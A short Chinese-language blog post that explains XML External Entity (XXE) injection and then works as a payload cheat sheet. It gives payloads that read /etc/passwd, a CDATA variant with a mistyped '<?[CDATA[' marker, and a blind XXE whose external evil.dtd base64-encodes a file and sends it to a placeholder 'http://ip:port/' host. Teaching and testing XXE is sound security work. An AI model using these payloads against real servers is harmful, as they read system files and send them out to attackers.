Some Tips of XXE

XXE(XML External Entity Injection) XML外部实体注入

XML是一种标记语言,具有一个名为DTD(document type definition)的格式规范

示例:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "test" >]>

其中 ENTITY为实体,而实体又分为外部实体与内部实体,上面就是外部实体,从外部dtd文件中引用时就成为外部实体

示例:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>

除了使用SYSTEM引用,我们还能够引用公用DTD

<!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”>

从其他角度看,实体又分两种:

1.通用实体:

&实体名,在DTD中定义,在XML中引用

2.参数实体:

% 实体名,在DTD中定义并只能在DTD中用%实体名引用

注意:参数实体定义时%与实体名之间的空格是不可少的

(参数实体在Blind XXE中用处极大)

XXE payload

Normal XXE

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE vul [
<!ENTITY pwn SYSTEM "file:///etc/passwd"> ]>
<vul>&pwn;</vul>

Normal XXE(CDATA)

(当待读取文件含有可能导致xml解析错误时,使用CDATA可以将所有字符当作常量部分,而非xml标记)

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE vul [
<!ENTITY % start "<?[CDATA[">
<!ENTITY % pwn SYSTEM "file:///etc/passwd">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://ip/evil.dtd">
% dtd;]>
<vul>&pwn;</vul>

evil.dtd

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%pwn;%end;">

Bind XXE

无回显时(大部分如此),且服务器可引用外部dtd时

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE vul[
<!ENTITY % remote SYSTEM "http://ip/evil.dtd">
%remote;%pwn;%send;]><vul></vul>

evil.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % pwn "<!ENTITY &#37; send SYSTEM 'http://ip:port/?f=%file;'>">

此处若服务器能够报错,当ip,port无法访问时也可报错出%file变量

tip:不可读取过长文件,会有DOMDocument::loadXML(): Detected an entity reference loop in的错误

Author: 12end
Link: 12end.xyz/2019/08/16/XXE/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.